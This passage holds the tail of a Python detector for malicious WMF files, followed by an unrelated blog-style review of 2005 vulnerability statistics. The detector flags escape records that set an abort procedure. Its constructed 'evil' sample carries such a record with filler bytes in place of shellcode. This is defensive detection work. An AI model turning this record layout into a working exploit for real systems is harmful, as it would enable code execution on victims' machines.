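    escape, or a record table the parser cannot walk, is reason to refuse it."""
    try:
        return bool(find_abortproc_escapes(data))
    except ValueError:
        return True


def _record(function, params=b""):
    """One WMF record: size in WORDs (incl. this field), function, params."""
    body = struct.pack("<H", function) + params
    if len(body) % 2:
        body += b"\x00"  # records are sized in WORDs, so pad odd params
    return struct.pack("<I", (len(body) + 4) // 2) + body


def build_wmf(records):
    """Assemble a minimal disk-type WMF (no placeable header) around records."""
    eof = _record(META_EOF)
    body = b"".join(records) + eof
    max_rec = max(len(r) // 2 for r in records + [eof])
    header = struct.pack("<HHHIHIH", 2, 9, 0x0300, (18 + len(body)) // 2, 0, max_rec, 0)
    return header + body


# Constructed samples: a benign file with one map-mode record, and the same
# file with an escape record that sets an abort procedure (filler, not shellcode).
BENIGN_WMF = build_wmf([_record(META_SETMAPMODE, struct.pack("<H", MM_ANISOTROPIC))])
EVIL_WMF = build_wmf([
    _record(META_SETMAPMODE, struct.pack("<H", MM_ANISOTROPIC)),
    _record(META_ESCAPE, struct.pack("<HH", SETABORTPROC, 16) + b"A" * 16),
])

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_WMF), ("evil", EVIL_WMF)):
        print(name, len(blob), "bytes, suspicious:", is_suspicious(blob),
              find_abortproc_escapes(blob))
```

This is the check gateway scanners and IDS signatures converged on for the WMF issue: rather than trying to recognize a particular payload, refuse the one record type that turns a picture into a callback registration.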


Goodbye 2005, welcome 2006 (year statistics)

As 2005 comes to an end, we can look back and try to use that to guess what we will see in 2006, but let’s first summarize what we had:
1) Over 1500 new vulnerability groups (we call them ‘groups’ since we don’t split an SQL injection and its cross-site scripting counterpart into two advisories), which is up by roughly 300 compared to last year.

2) A jump in exploits (i.e. advisories with little technical detail, the majority of them being a PoC or an actual exploit) from 150 to 295.

3) The number of Microsoft related advisories (not just MSXX-XXX) has jumped from 66 to 133, a little more than double.

4) IIS related vulnerabilities have declined from 13 to 8.

5) A decrease in the number of Apache related advisories from 23 to 11.

6) The busiest month was May, with over 170 new articles (roughly 6 articles per day, including the weekends).

So what will 2006 bring? My estimate is that we’ll see MORE vulnerabilities. Why? Simply because as more software comes into the consumer market, it is more likely that people will find vulnerabilities in it.

As more Web based products emerge, SQL injection, Directory Traversal, Cross Site Scripting and the like will become the majority of vulnerabilities, while Buffer Overflows and Format Strings become the minority.

The number of “Phishing” attacks will greatly increase, and become a lot more clever as the thieves get smarter and the methods become simpler. “Phishing” will also start utilizing more custom made Spyware and exploits, to try and make the victim believe that they are not being “Phished”.
